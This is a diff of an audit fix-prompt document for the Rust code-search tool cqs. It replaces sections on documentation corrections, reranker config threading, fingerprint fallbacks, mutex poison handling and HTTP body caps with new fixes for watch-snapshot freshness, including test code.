+- P1.10: SEC-V1.30.1-8 (env snapshot redaction)
+- P1.11: DS-V1.30.1-D2 (reconcile cap)
+- P1.12: AC-V1.30.1-1 (reconcile non-monotonic mtime)
 
-**Finding:** P1.1 + P1.2 in audit-triage.md / Documentation in audit-findings.md (DOC-V1.30-1, DOC-V1.30-2)
-**Files:** `PRIVACY.md:21-22`, `SECURITY.md:101`, `src/cli/batch/commands.rs:371-399`
-**Why:** PRIVACY claims query_log is opt-in but `log_query` is unconditional. PRIVACY claims 7-day TTL on query_cache; only size cap exists. Both are P1 "docs lying" — fix the docs (defensible direction; gating the log requires touching every dispatch arm and changing user-visible behaviour).
-
-### Current docs (PRIVACY.md:21-22)
-
-```markdown
-- `~/.cache/cqs/query_cache.db` — recent query embeddings with a 7-day TTL. Speeds up repeated searches.
-- `~/.cache/cqs/query_log.jsonl` — opt-in query log, written only when `CQS_TELEMETRY=1` or the file already exists. Stays local.
-```
-
-### Replacement (PRIVACY.md:21-22)
-
-```markdown
-- `~/.cache/cqs/query_cache.db` — recent query embeddings, evicted oldest-first when the DB exceeds `CQS_QUERY_CACHE_MAX_SIZE` (100 MiB default). Prune older entries with `cqs cache prune <DAYS>`. Speeds up repeated searches.
-- `~/.cache/cqs/query_log.jsonl` — local query log written by every `cqs chat` / `cqs batch` invocation (search/gather/onboard/scout/where/task). Append-only JSONL. Delete the file to disable; `cqs cache clear` does not remove it. Stays local.
-```
-
-### Current docs (SECURITY.md:101)
-
-```markdown
-| `~/.cache/cqs/query_log.jsonl` | Opt-in local query log | `CQS_TELEMETRY=1` or file exists |
-```
-
-### Replacement (SECURITY.md:101)
-
-```markdown
-| `~/.cache/cqs/query_log.jsonl` | Local query log (append-only) | `cqs chat` / `cqs batch` (search, gather, onboard, scout, where, task) |
-```
-
-### Notes
-
-- The "fix the code" alternative (gate `log_query` on `CQS_TELEMETRY=1` plus existing-file check) is the *more defensible* contract but a behaviour change. Pick docs-fix here unless reviewer explicitly opts into a behaviour change. If the reviewer chooses code-fix, gate the body of `log_query` (`src/cli/batch/commands.rs:371`) on `std::env::var("CQS_TELEMETRY").as_deref() == Ok("1") || log_path.exists()` returning early otherwise.
+Total finding IDs covered: 14. Total distinct prompts: 12 (some grouped).
 
 ---
 
-## P1.3 — CHANGELOG names CQS_LLM_ENDPOINT — actual var is CQS_LLM_API_BASE
+## P1.1: CQ-V1.30.1-2 + DS-V1.30.1-D6 + TC-ADV-1.30.1-8 — `delta_saturated` ignored by `compute()`
 
-**Finding:** P1.3 in audit-triage.md / Documentation DOC-V1.30-3
-**Files:** `CHANGELOG.md:19`
-**Why:** CHANGELOG v1.30.0 entry references `CQS_LLM_ENDPOINT`, which does not exist in the codebase. Actual env var is `CQS_LLM_API_BASE` (plus `CQS_LLM_PROVIDER=local`). User copy-pasting fails at runtime.
+**Files:** `src/watch_status.rs:199-209`, `src/watch_status.rs:233-323` (test module)
+**Effort:** ~10 minutes
+**Why:** `WatchSnapshotInput` carries `delta_saturated`, and `publish_watch_snapshot` plumbs it through, but `compute()` never consults the field. After a saturated rebuild discards on swap, `pending_rebuild` becomes `None` and `compute()` reports `Fresh` — `cqs eval --require-fresh` accepts a doomed rebuild's stale on-disk index. Defeats #1182's day-1 freshness contract. Same root cause cross-listed in code-quality, data-safety, and adversarial test coverage.
 
-### Current
-
-```markdown
-- **Local LLM provider (OpenAI-compatible)** — `cqs index --llm-summaries` accepts a local OpenAI-compatible endpoint via `CQS_LLM_ENDPOINT`, in addition to the existing Anthropic Batches API path (#1101 — closes audit finding EX-V1.29-3). `LlmProvider` trait, `LocalProvider` implementation, end-to-end summary generation via local vLLM / Ollama / etc.
-```
-
-### Replacement
-
-```markdown
-- **Local LLM provider (OpenAI-compatible)** — `cqs index --llm-summaries` accepts a local OpenAI-compatible endpoint via `CQS_LLM_PROVIDER=local` + `CQS_LLM_API_BASE=<url>`, in addition to the existing Anthropic Batches API path (#1101 — closes audit finding EX-V1.29-3). `LlmProvider` trait, `LocalProvider` implementation, end-to-end summary generation via local vLLM / Ollama / etc.
-```
-
----
-
-## P1.4 — CONTRIBUTING tells contributors to edit dispatch.rs (registry.rs now)
-
-**Finding:** P1.4 in audit-triage.md / Documentation DOC-V1.30-4
-**Files:** `CONTRIBUTING.md:339-355` (checklist), `CONTRIBUTING.md:153-158` (Architecture Overview)
-**Why:** v1.30.0 #1097/#1114 collapsed five exhaustive matches in `dispatch.rs`/`definitions.rs` into one `for_each_command!` table in `src/cli/registry.rs`. The contributor checklist still says "match arm in `src/cli/dispatch.rs`" with no mention of `registry.rs`.
-
-### Current (CONTRIBUTING.md:339-355)
-
-```markdown
-## Adding a New CLI Command
-
-Checklist for every new command:
-
-1. **Implementation** — `src/cli/commands/<category>/<name>.rs` with the core logic (pick category: search/, graph/, review/, index/, io/, infra/, train/)
-2. **Category mod.rs** — add `mod <name>;` + `pub(crate) use <name>::*;` in `src/cli/commands/<category>/mod.rs`
-3. **CLI definition** — `Commands` enum variant in `src/cli/definitions.rs` with clap args
-4. **Dispatch** — match arm in `src/cli/dispatch.rs`
-5. **`--json` support** — serde serialization for programmatic output
-6. **Tracing** — `tracing::info_span!` at entry, `tracing::warn!` on error fallback
-7. **Error handling** — `Result` propagation, no bare `.unwrap_or_default()` in production
-8. **Tests** — happy path + empty input + error path + edge cases
-9. **CLAUDE.md** — add to the command reference section
-10. **Skills** — add to `.claude/skills/cqs/SKILL.md` and `.claude/skills/cqs-bootstrap/SKILL.md`
-11. **CHANGELOG** — entry in the next release section
-```
-
-### Replacement (CONTRIBUTING.md:339-355)
-
-```markdown
-## Adding a New CLI Command
-
-Checklist for every new command:
-
-1. **Implementation** — `src/cli/commands/<category>/<name>.rs` with the core logic (pick category: search/, graph/, review/, index/, io/, infra/, train/)
-2. **Category mod.rs** — add `mod <name>;` + `pub(crate) use <name>::*;` in `src/cli/commands/<category>/mod.rs`
-3. **CLI definition** — `Commands` enum variant in `src/cli/definitions.rs` with clap args
-4. **Registry row** — add a `(bind, wild, name, batch_support, body)` row to `group_a` or `group_b` in `src/cli/registry.rs`. The `for_each_command!` macro generates dispatch + variant_name + batch_support from this single row; a missing row is a compile error.
-5. **`--json` support** — serde serialization for programmatic output
-6. **Tracing** — `tracing::info_span!` at entry, `tracing::warn!` on error fallback
-7. **Error handling** — `Result` propagation, no bare `.unwrap_or_default()` in production
-8. **Tests** — happy path + empty input + error path + edge cases
-9. **CLAUDE.md** — add to the command reference section
-10. **Skills** — add to `.claude/skills/cqs/SKILL.md` and `.claude/skills/cqs-bootstrap/SKILL.md`
-11. **CHANGELOG** — entry in the next release section
-```
-
-### Current (Architecture Overview, CONTRIBUTING.md:153-158)
-
-```markdown
-  cli/          - Command-line interface (clap)
-    mod.rs      - Top-level CLI module, re-exports
-    definitions.rs - Clap argument definitions and command enum
-    dispatch.rs - Command dispatch (match on command, call handlers)
-    commands/   - Command implementations (organized by category)
-```
-
-### Replacement (Architecture Overview)
-
-```markdown
-  cli/          - Command-line interface (clap)
-    mod.rs      - Top-level CLI module, re-exports
-    definitions.rs - Clap argument definitions and command enum
-    registry.rs - `for_each_command!` table; single source of truth for dispatch + variant_name + batch_support
-    dispatch.rs - Command dispatch helpers (entry points; per-command arms generated from `registry.rs`)
-    commands/   - Command implementations (organized by category)
-```
-
----
-
-## P1.5 — ProjectRegistry doc lies about path on macOS/Windows
-
-**Finding:** P1.5 in audit-triage.md / Platform Behavior section
-**Files:** `src/project.rs:1-3, 176-179`
-**Why:** Module-level doc claims `~/.config/cqs/projects.toml` but `dirs::config_dir()` returns macOS-specific (`~/Library/Application Support/`) and Windows-specific (`%APPDATA%\`) paths. Path is constructed correctly; only the doc is wrong.
-
-### Current code (src/project.rs:1-4)
+### Current code
 
 ```rust
-//! Cross-project search via global project registry.
-//!
-//! Maintains a registry of indexed projects at `~/.config/cqs/projects.toml`.
-//! Enables searching across all registered projects from anywhere.
-```
-
-### Replacement
-
-```rust
-//! Cross-project search via global project registry.
-//!
-//! Maintains a registry of indexed projects in the platform config directory
-//! (via `dirs::config_dir()`):
-//! - Linux: `~/.config/cqs/projects.toml`
-//! - macOS: `~/Library/Application Support/cqs/projects.toml`
-//! - Windows: `%APPDATA%\cqs\projects.toml`
-//!
-//! Enables searching across all registered projects from anywhere.
-```
-
-### Current code (src/project.rs:175-179)
-
-```rust
-/// Get the registry file path
-fn registry_path() -> Result<PathBuf, ProjectError> {
-    let config_dir = dirs::config_dir().ok_or(ProjectError::ConfigDirNotFound)?;
-    Ok(config_dir.join("cqs").join("projects.toml"))
-}
-```
-
-### Replacement
-
-```rust
-/// Get the registry file path.
-///
-/// Resolves via `dirs::config_dir()`:
-/// - Linux: `~/.config/cqs/projects.toml`
-/// - macOS: `~/Library/Application Support/cqs/projects.toml`
-/// - Windows: `%APPDATA%\cqs\projects.toml`
-fn registry_path() -> Result<PathBuf, ProjectError> {
-    let config_dir = dirs::config_dir().ok_or(ProjectError::ConfigDirNotFound)?;
-    Ok(config_dir.join("cqs").join("projects.toml"))
-}
-```
-
----
-
-## P1.6 — gather warning hardcodes "200" — lies when CQS_GATHER_MAX_NODES set
-
-**Finding:** P1.6 in audit-triage.md / Code Quality
-**Files:** `src/cli/commands/search/gather.rs:200`, `src/gather.rs:153-172` (`gather_max_nodes`)
-**Why:** Text-mode warning says "capped at 200 nodes" but actual cap obeys `CQS_GATHER_MAX_NODES`. With `CQS_GATHER_MAX_NODES=500`, the user sees "capped at 200" while results were capped at 500.
-
-### Current code (src/cli/commands/search/gather.rs:199-201)
-
-```rust
-        if result.expansion_capped {
-            println!("{}", "Warning: expansion capped at 200 nodes".yellow());
-        }
-```
-
-### Replacement
-
-```rust
-        if result.expansion_capped {
-            let cap = cqs::gather::gather_max_nodes();
-            println!(
-                "{}",
-                format!("Warning: expansion capped at {cap} nodes").yellow()
-            );
-        }
-```
-
-### Notes
-
-- `gather_max_nodes` is already memoized via `OnceLock` (per `src/gather.rs:153-172`), so this is cheap.
-- Verify that `gather::gather_max_nodes` is `pub`; if not, expose it (`pub fn`) and re-export from `lib.rs` if needed.
-- Stretch goal flagged in audit: surface `expansion_cap_used: usize` on `GatherResult` so `--json` consumers also see the real cap. Out of scope for the easy fix here.
-
----
-
-## P1.7 — Reranker silently ignores [reranker] config section
-
-**Finding:** P1.7 in audit-triage.md / Code Quality
-**Files:** `src/reranker.rs:127-154` (`Reranker::new`), `src/reranker.rs:61-77` (`resolve_reranker`), `src/reranker.rs:442-446` (`model_paths` calls `resolve_reranker(None)`), production callers `src/cli/store.rs:276`, `src/cli/batch/mod.rs:1274`
-**Why:** `resolve_reranker` accepts `Option<&AuxModelSection>` to thread `Config::reranker` (`src/config.rs:228`) through, but `Reranker::model_paths` always passes `None`. A user `.cqs.toml` `[reranker] preset = "bge-reranker-base"` is silently dropped — user gets default ms-marco-MiniLM with no error or warn.
-
-### Current code (src/reranker.rs:106-154)
-
-```rust
-pub struct Reranker {
-    session: Mutex<Option<Session>>,
-    tokenizer: Mutex<Option<Arc<tokenizers::Tokenizer>>>,
-    model_paths: OnceCell<(PathBuf, PathBuf)>,
-    provider: ExecutionProvider,
-    max_length: usize,
-    expects_token_type_ids: Mutex<Option<bool>>,
-}
-
-impl Reranker {
-    /// Create a new reranker with lazy model loading
-    pub fn new() -> Result<Self, RerankerError> {
-        let provider = select_provider();
-        let max_length = match std::env::var("CQS_RERANKER_MAX_LENGTH") {
-            // ... unchanged ...
+//   src/watch_status.rs:199-209
+    pub fn compute(input: WatchSnapshotInput<'_>) -> Self {
+        let state = if input.rebuild_in_flight {
+            FreshnessState::Rebuilding
+        } else if input.pending_files_count > 0
+            || input.pending_notes
+            || input.dropped_this_cycle > 0
+        {
+            FreshnessState::Stale
+        } else {
+            FreshnessState::Fresh
         };
-        Ok(Self {
-            session: Mutex::new(None),
-            tokenizer: Mutex::new(None),
-            model_paths: OnceCell::new(),
-            provider,
-            max_length,
-            expects_token_type_ids: Mutex::new(None),
-        })
-    }
 ```
 
-### Current code (src/reranker.rs:442-446)
+### Replacement
 
 ```rust
-    fn model_paths(&self) -> Result<&(PathBuf, PathBuf), RerankerError> {
-        self.model_paths.get_or_try_init(|| {
-            let _span = tracing::info_span!("reranker_model_resolve").entered();
-
-            let resolved = resolve_reranker(None)?;
-```
-
-### Replacement (struct + constructors, src/reranker.rs:106-154)
-
-```rust
-pub struct Reranker {
-    session: Mutex<Option<Session>>,
-    tokenizer: Mutex<Option<Arc<tokenizers::Tokenizer>>>,
-    model_paths: OnceCell<(PathBuf, PathBuf)>,
-    provider: ExecutionProvider,
-    max_length: usize,
-    expects_token_type_ids: Mutex<Option<bool>>,
-    /// Cached config-file `[reranker]` section so `resolve_reranker` honours
-    /// `preset` / `model_path` / `tokenizer_path` set in `.cqs.toml`.
-    section: Option<AuxModelSection>,
-}
-
-impl Reranker {
-    /// Create a new reranker with lazy model loading (config-less; CLI/env only).
-    pub fn new() -> Result<Self, RerankerError> {
-        Self::with_section(None)
-    }
-
-    /// Create a reranker, threading a `[reranker]` config section through to
-    /// `resolve_reranker` so `.cqs.toml` preset / model_path are honoured.
-    pub fn with_section(section: Option<AuxModelSection>) -> Result<Self, RerankerError> {
-        let provider = select_provider();
-        let max_length = match std::env::var("CQS_RERANKER_MAX_LENGTH") {
-            // ... unchanged body ...
+    pub fn compute(input: WatchSnapshotInput<'_>) -> Self {
+        let state = if input.rebuild_in_flight {
+            FreshnessState::Rebuilding
+        } else if input.pending_files_count > 0
+            || input.pending_notes
+            || input.dropped_this_cycle > 0
+            || input.delta_saturated
+        {
+            // CQ-V1.30.1-2 / DS-V1.30.1-D6: a saturated delta means the
+            // rebuilt HNSW was discarded on swap (rebuild.rs:60-63); the
+            // on-disk index is whatever was there before the rebuild
+            // started. Treat as Stale until the next threshold rebuild
+            // lands cleanly, so `cqs eval --require-fresh` waits.
+            FreshnessState::Stale
+        } else {
+            FreshnessState::Fresh
         };
-        Ok(Self {
-            session: Mutex::new(None),
-            tokenizer: Mutex::new(None),
-            model_paths: OnceCell::new(),
-            provider,
-            max_length,
-            expects_token_type_ids: Mutex::new(None),
-            section,
-        })
+```
+
+Then add the missing test in the same file's `#[cfg(test)] mod tests` block, right after the `dropped_events_mark_stale` test (around line 295):
+
+```rust
+    /// CQ-V1.30.1-2 / TC-ADV-1.30.1-8: a saturated delta means the in-flight
+    /// rebuild's pending delta exceeded `MAX_PENDING_REBUILD_DELTA` and the
+    /// rebuilt HNSW will be discarded on swap. Until the next threshold
+    /// rebuild reads SQLite fresh, the on-disk index is stale. The flag
+    /// is published; `compute()` must treat it as a Stale signal so
+    /// `cqs eval --require-fresh` doesn't accept a doomed rebuild.
+    #[test]
+    fn delta_saturated_marks_stale_when_no_other_work() {
+        let snap = WatchSnapshot::compute(WatchSnapshotInput {
+            pending_files_count: 0,
+            pending_notes: false,
+            rebuild_in_flight: false,
+            delta_saturated: true,
+            incremental_count: 0,
+            dropped_this_cycle: 0,
+            last_event: std::time::Instant::now(),
+            last_synced_at: None,
+            _marker: std::marker::PhantomData,
+        });
+        assert_eq!(snap.state, FreshnessState::Stale);
+        assert!(snap.delta_saturated);
+    }
+
+    /// `Rebuilding` still wins when the rebuild is in flight even with a
+    /// saturated delta — the saturation will be observed when the rebuild
+    /// drains and `rebuild_in_flight` flips to false.
+    #[test]
+    fn rebuild_in_flight_dominates_over_delta_saturated() {
+        let snap = WatchSnapshot::compute(WatchSnapshotInput {
+            pending_files_count: 0,
+            pending_notes: false,
+            rebuild_in_flight: true,
+            delta_saturated: true,
+            incremental_count: 0,
+            dropped_this_cycle: 0,
+            last_event: std::time::Instant::now(),
+            last_synced_at: None,
+            _marker: std::marker::PhantomData,
+        });
+        assert_eq!(snap.state, FreshnessState::Rebuilding);
     }
 ```
 
-### Replacement (model_paths, src/reranker.rs:442-446)
+### Verification
 
-```rust
-    fn model_paths(&self) -> Result<&(PathBuf, PathBuf), RerankerError> {
-        self.model_paths.get_or_try_init(|| {
-            let _span = tracing::info_span!("reranker_model_resolve").entered();
-
-            let resolved = resolve_reranker(self.section.as_ref())?;
-```
-
-### Replacement (callers)
-
-`src/cli/store.rs:276`:
-```rust
-        let r = cqs::Reranker::with_section(config.reranker.clone())
-            .map_err(|e| anyhow::anyhow!("Reranker init failed: {e}"))?;
-```
-
-`src/cli/batch/mod.rs:1274`:
-```rust
-        let r = cqs::Reranker::with_section(config.reranker.clone())
-            .map_err(|e| anyhow::anyhow!("Reranker init failed: {e}"))?;
-```
-
-### Notes
-
-- `AuxModelSection` is owned (`Clone`-able) per `src/config.rs:228`; cloning is cheap (small struct of `Option<String>`s).
-- Need `pub use` of `AuxModelSection` if not already exported from `cqs::` lib; check `src/lib.rs`.
-- Re-export verify: `cqs::Reranker::with_section` must compile from outside the crate root (`cli` is in-crate, fine).
-- Test sites in `src/reranker.rs:712, 718, 772, 823` continue using `Reranker::new()` (no section needed).
-- Add a regression test `with_section_preset_overrides_default` that constructs a `Reranker::with_section(Some(AuxModelSection { preset: Some("bge-reranker-base".into()), .. }))`, calls `model_paths()`, and asserts the resolved repo matches the bge preset (not ms-marco).
+- `cargo build --features cuda-index`
+- `cargo test --features cuda-index --lib watch_status::tests::delta_saturated_marks_stale_when_no_other_work`
+- `cargo test --features cuda-index --lib watch_status::tests::rebuild_in_flight_dominates_over_delta_saturated`
+- `cargo test --features cuda-index --lib watch_status::tests` (full suite — empty-state-fresh, dropped-marks-stale, rebuild-dominates must still pass)
 
 ---
 
-## P1.8 — Embedder fingerprint falls back to repo:timestamp — cache thrash
+## P1.2: CQ-V1.30.1-1 + AC-V1.30.1-4 + DS-V1.30.1-D8 — `dropped_this_cycle` reset before publish
 
-**Finding:** P1.8 in audit-triage.md / Error Handling + Data Safety
-**Files:** `src/embedder/mod.rs:435-466`
-**Why:** Three error arms fall back to `format!("{}:{}", self.model_config.repo, ts)` where `ts = SystemTime::now()`. Every restart with a transient hash failure (AV scanner, EBUSY, I/O hiccup) writes cache rows under a NEW timestamp, so subsequent reads miss the cache forever. Cross-slot copy by `content_hash` also breaks because the model fingerprint isn't stable.
+**Files:** `src/cli/watch/events.rs:131-157`
+**Effort:** ~15 minutes
+**Why:** `process_file_changes` clears `state.dropped_this_cycle = 0` at line 145 *before* (a) the embedder-init check that may early-`return` and (b) the snapshot publish that runs at the end of the outer loop iteration. Two failure modes share one fix:
 
-### Current code (src/embedder/mod.rs:432-466)
+1. (CQ-V1.30.1-1 / DS-V1.30.1-D8) The next `publish_watch_snapshot` always sees `dropped_this_cycle == 0` even when the cycle that just ran started with a non-zero count. `compute()` uses `dropped_this_cycle > 0` as a Stale signal — never observed.
+2. (AC-V1.30.1-4) When `try_init_embedder` returns `None` at line 156, the function early-returns with `pending_files` already drained AND `dropped_this_cycle` zeroed, having processed no chunks. Total signal loss when embedder init fails.
 
-```rust
-                                            hash
-                                        }
-                                        Err(e) => {
-                                            tracing::warn!(error = %e, "Failed to stream-hash model, using repo+timestamp fallback");
-                                            let ts = std::time::SystemTime::now()
-                                                .duration_since(std::time::UNIX_EPOCH)
-                                                .unwrap_or_default()
-                                                .as_secs();
-                                            format!("{}:{}", self.model_config.repo, ts)
-                                        }
-                                    }
-                                }
-                                Err(e) => {
-                                    tracing::warn!(error = %e, "Failed to open model for fingerprint, using repo+timestamp fallback");
-                                    let ts = std::time::SystemTime::now()
-                                        .duration_since(std::time::UNIX_EPOCH)
-                                        .unwrap_or_default()
-                                        .as_secs();
-                                    format!("{}:{}", self.model_config.repo, ts)
-                                }
-                            }
-                        }
-                    }
-                }
-                Err(e) => {
-                    tracing::warn!(error = %e, "Failed to get model paths for fingerprint, using repo+timestamp fallback");
-                    let ts = std::time::SystemTime::now()
-                        .duration_since(std::time::UNIX_EPOCH)
-                        .unwrap_or_default()
-                        .as_secs();
-                    format!("{}:{}", self.model_config.repo, ts)
-                }
-            }
-        })
-    }
-```
+Fix: move the reset to *after* the embedder-init check, then keep the warn unconditional so operators see the count even if drain fails downstream.
 
-### Replacement
-
-Replace each `repo:timestamp` fallback with a stable `repo:fallback:size=<bytes>` (or `:size=unknown`) shape. The size+repo proxy is deterministic across restarts within the same model file.
+### Current code
 
 ```rust
-                                            hash
-                                        }
-                                        Err(e) => {
-                                            tracing::warn!(
-                                                error = %e,
-                                                "Failed to stream-hash model, using repo+size fallback (cache may miss until next successful hash)"
-                                            );
-                                            let size = std::fs::metadata(model_path)
-                                                .ok()
-                                                .map(|m| m.len())
-                                                .unwrap_or(0);
-                                            format!("{}:fallback:size={}", self.model_config.repo, size)
-                                        }
-                                    }
-                                }
-                                Err(e) => {
-                                    tracing::warn!(
-                                        error = %e,
-                                        "Failed to open model for fingerprint, using repo+size fallback"
-                                    );
-                                    let size = std::fs::metadata(model_path)
-                                        .ok()
-                                        .map(|m| m.len())
-                                        .unwrap_or(0);
-                                    format!("{}:fallback:size={}", self.model_config.repo, size)
-                                }
-                            }
-                        }
-                    }
-                }
-                Err(e) => {
-                    tracing::warn!(
-                        error = %e,
-                        "Failed to get model paths for fingerprint, using repo-only fallback"
-                    );
-                    format!("{}:fallback:no-path", self.model_config.repo)
-                }
-            }
-        })
-    }
-```
+//   src/cli/watch/events.rs:131-157
+pub(super) fn process_file_changes(cfg: &WatchConfig, store: &Store, state: &mut WatchState) {
+    let files: Vec<PathBuf> = state.pending_files.drain().collect();
+    let _span = info_span!("process_file_changes", file_count = files.len()).entered();
+    state.pending_files.shrink_to(64);
 
-### Notes
-
-- The "model path resolution failed" arm (line 457) cannot read file size (path unknown), so use `:fallback:no-path` as a stable sentinel — still not time-varying.
-- Audit suggests promoting the failure to a hard error. That's a behaviour change with downstream surface (every `Embedder::*` call now returns `Result<&str, EmbedderError>`). Out of scope here; the size-fallback closes the cache-thrash bug without breaking existing call signatures.
-- `cqs doctor` should warn when `model_fingerprint` starts with `:fallback:` — separate small follow-up; cite as `audit doctor warn fallback fingerprint`.
-
----
-
-## P1.9 — LocalProvider Mutex::into_inner().unwrap_or_default() loses all batch results on poison
-
-**Finding:** P1.9 in audit-triage.md / Error Handling
-**Files:** `src/llm/local.rs:271, 272, 278, 279, 305, 308`
-**Why:** On `Mutex::into_inner` returning `Err` (poison), `unwrap_or_default()` substitutes an empty `HashMap` and `submit_via_chat_completions` reports `succeeded` ≠ map size with no error signal. Downstream `fetch_batch_results` returns `{}` and the user persists nothing.
-
-### Current code (src/llm/local.rs:271-309)
-
-```rust
-        let ok = *succeeded.lock().unwrap();
-        let err = *failed.lock().unwrap();
-        let elapsed_ms = start.elapsed().as_millis() as u64;
-
-        // Fatal-batch check: if every item that talked to the server saw
-        // 401/403 on its first request, the credentials are wrong — abort
-        // with a specific error instead of silently returning an empty stash.
-        let auth_fail = *auth_failures.lock().unwrap();
-        let auth_attempt = *auth_attempts.lock().unwrap();
-        if auth_attempt > 0 && auth_fail == auth_attempt {
-            tracing::error!(
-                url = %self.api_base,
-                "local batch aborted: all {} requests rejected with 401/403",
-                auth_attempt
-            );
-            return Err(LlmError::Api {
-                status: 401,
-                message: format!(
-                    "Authentication rejected at {}; check CQS_LLM_API_KEY",
-                    self.api_base
-                ),
-            });
-        }
-
-        tracing::info!(
-            batch_id = %batch_id,
-            submitted = items.len(),
-            succeeded = ok,
-            failed = err,
-            elapsed_ms,
-            "local batch complete"
+    // RM-V1.25-23: surface truncated cycles at warn level so operators
+    // notice the gap. The per-event drops are logged at debug to keep
+    // the journal clean on bulk edits.
+    if state.dropped_this_cycle > 0 {
+        tracing::warn!(
+            dropped = state.dropped_this_cycle,
+            cap = max_pending_files(),
+            "Watch event queue full this cycle; dropping events. Run `cqs index` to catch up"
         );
-
-        // Move results into the stash under the batch id.
-        let results_map = results.into_inner().unwrap_or_default();
-        self.stash
-            .lock()
-            .unwrap()
-            .insert(batch_id.clone(), results_map);
-
-        Ok(batch_id)
+        state.dropped_this_cycle = 0;
     }
-```
-
-### Replacement
-
-```rust
-        // Recover counters even on poison — counts are advisory and dropping
-        // the count to 0 would mask real progress in the "complete" log.
-        let ok = *succeeded.lock().unwrap_or_else(|p| p.into_inner());
-        let err = *failed.lock().unwrap_or_else(|p| p.into_inner());
-        let elapsed_ms = start.elapsed().as_millis() as u64;
-
-        // Fatal-batch check: if every item that talked to the server saw
-        // 401/403 on its first request, the credentials are wrong — abort
-        // with a specific error instead of silently returning an empty stash.
-        let auth_fail = *auth_failures.lock().unwrap_or_else(|p| p.into_inner());
-        let auth_attempt = *auth_attempts.lock().unwrap_or_else(|p| p.into_inner());
-        if auth_attempt > 0 && auth_fail == auth_attempt {
-            tracing::error!(
-                url = %self.api_base,
-                "local batch aborted: all {} requests rejected with 401/403",
-                auth_attempt
-            );
-            return Err(LlmError::Api {
-                status: 401,
-                message: format!(
-                    "Authentication rejected at {}; check CQS_LLM_API_KEY",
-                    self.api_base
-                ),
-            });
-        }
-
-        tracing::info!(
-            batch_id = %batch_id,
-            submitted = items.len(),
-            succeeded = ok,
-            failed = err,
-            elapsed_ms,
-            "local batch complete"
-        );
-
-        // Move results into the stash under the batch id. On poison we recover
-        // the partially-populated map rather than silently substituting an
-        // empty one — losing partial results is worse than the panic risk.
-        let results_map = match results.into_inner() {
-            Ok(m) => m,
-            Err(poisoned) => {
-                tracing::error!(
-                    succeeded = ok,
-                    "results mutex poisoned during local batch — recovering inner state"
-                );
-                poisoned.into_inner()
-            }
-        };
-
-        // Invariant: if results_map.len() != ok, accounting drifted. Surface
-        // it loudly rather than shipping a short stash silently.
-        if results_map.len() != ok {
-            tracing::error!(
-                map_len = results_map.len(),
-                succeeded = ok,
-                "local batch accounting drift: results map size != succeeded count"
-            );
-            return Err(LlmError::Internal(format!(
-                "local batch accounting drift: ok={ok} map_len={}",
-                results_map.len()
-            )));
-        }
-
-        self.stash
-            .lock()
-            .unwrap_or_else(|p| p.into_inner())
-            .insert(batch_id.clone(), results_map);
-
-        Ok(batch_id)
-    }
-```
-
-### Notes
-
-- `LlmError::Internal(String)` — verify this variant exists in `src/llm/mod.rs::LlmError`. If not, add it: `#[error("Internal error: {0}")] Internal(String)`.
-- The `if let Ok(mut map) = results_ref.lock()` at line 196 (worker) intentionally tolerates poison (drops the result) — leave it. The poison cascade fix is the *finalisation* path.
-- The same poison pattern exists at line 393-396 for `auth_attempts/auth_failures` increment inside the worker; that's tracked by P2.35 (RB-V1.30-7) as a separate sweep.
-
----
-
-## P1.10 — LocalProvider unbounded HTTP body read — OOM on hostile/buggy server
-
-**Finding:** P1.10 in audit-triage.md / Robustness RB-V1.30-1
-**Files:** `src/llm/local.rs:97-100` (Client builder), `src/llm/local.rs:474-487` (`parse_choices_content`), `src/llm/local.rs:490-500` (`body_preview`)
-**Why:** `reqwest::blocking::Client` builder sets timeout + redirect only — no body cap. `resp.json::<Value>()` and `resp.text()` buffer the entire response. A panicked / hostile / misconfigured OpenAI-compat server can return a multi-GB body and OOM the daemon. Up to `local_concurrency()` (≤64) workers compound the risk.
-
-### Current code (src/llm/local.rs:88-115)
-
-```rust
-    pub fn new(llm_config: LlmConfig) -> Result<Self, LlmError> {
-        let _span = tracing::info_span!("local_provider_new").entered();
-
-        let concurrency = local_concurrency();
-        let timeout = local_timeout();
-        let api_key = std::env::var("CQS_LLM_API_KEY")
-            .ok()
-            .filter(|s| !s.is_empty());
-
-        let http = Client::builder()
-            .timeout(timeout)
-            .redirect(reqwest::redirect::Policy::none())
-            .build()?;
-
-        tracing::info!(
-            api_base = %llm_config.api_base,
-            model = %llm_config.model,
-            concurrency,
-            timeout_secs = timeout.as_secs(),
-            auth = api_key.is_some(),
-            "LocalProvider ready"
-        );
-
-        Ok(Self {
-            http,
-            api_base: llm_config.api_base,
-            model: llm_config.model,
-```
-
-### Current code (src/llm/local.rs:474-500)
-
-```rust
-fn parse_choices_content(resp: reqwest::blocking::Response) -> Result<Option<String>, LlmError> {
-    let body: serde_json::Value = resp.json()?;
-    // ... unchanged ...
-}
-
-fn body_preview(resp: reqwest::blocking::Response) -> String {
-    let body = resp.text().unwrap_or_default();
-    let cut = body
-        .char_indices()
-        .nth(256)
-        .map(|(i, _)| i)
-        .unwrap_or(body.len());
-    body[..cut].to_string()
-}
-```
-
-### Replacement (Client builder, lines 97-100)
-
-No change here — keep timeout + redirect. Apply the cap at the read sites instead.
-
-### Replacement (parse_choices_content, lines 474-488)
-
-```rust
-/// Hard cap on response body size. Summary outputs are typically a few hundred
-/// bytes; 4 MiB is ~1000× headroom. Larger bodies are a sign of a misbehaving
-/// or hostile endpoint and we'd rather error than OOM the daemon.
-///
-/// Override via `CQS_LOCAL_LLM_MAX_BODY_BYTES`.
-fn local_max_body_bytes() -> usize {
-    static MAX: std::sync::OnceLock<usize> = std::sync::OnceLock::new();
-    *MAX.get_or_init(|| {
-        std::env::var("CQS_LOCAL_LLM_MAX_BODY_BYTES")
-            .ok()
-            .and_then(|v| v.parse().ok())
-            .filter(|&n: &usize| n > 0)
-            .unwrap_or(4 * 1024 * 1024)
-    })
-}
-
-fn parse_choices_content(resp: reqwest::blocking::Response) -> Result<Option<String>, LlmError> {
-    use std::io::Read;
-    let cap = local_max_body_bytes();
-    let mut buf = Vec::with_capacity(8 * 1024);
-    resp.take(cap as u64 + 1).read_to_end(&mut buf).map_err(|e| {
-        LlmError::Http(format!("response body read failed: {e}"))
-    })?;
-    if buf.len() > cap {
-        return Err(LlmError::Http(format!(
-            "response body exceeds cap ({} > {})",
-            buf.len(),
-            cap
-        )));
-    }
-    let body: serde_json::Value = serde_json::from_slice(&buf).map_err(|e| {
-        LlmError::Http(format!("response body not valid JSON: {e}"))
-    })?;
-    let content = body
-        .get("choices")
-        .and_then(|v| v.as_array())
-        .and_then(|arr| arr.first())
-        .and_then(|first| first.get("message"))
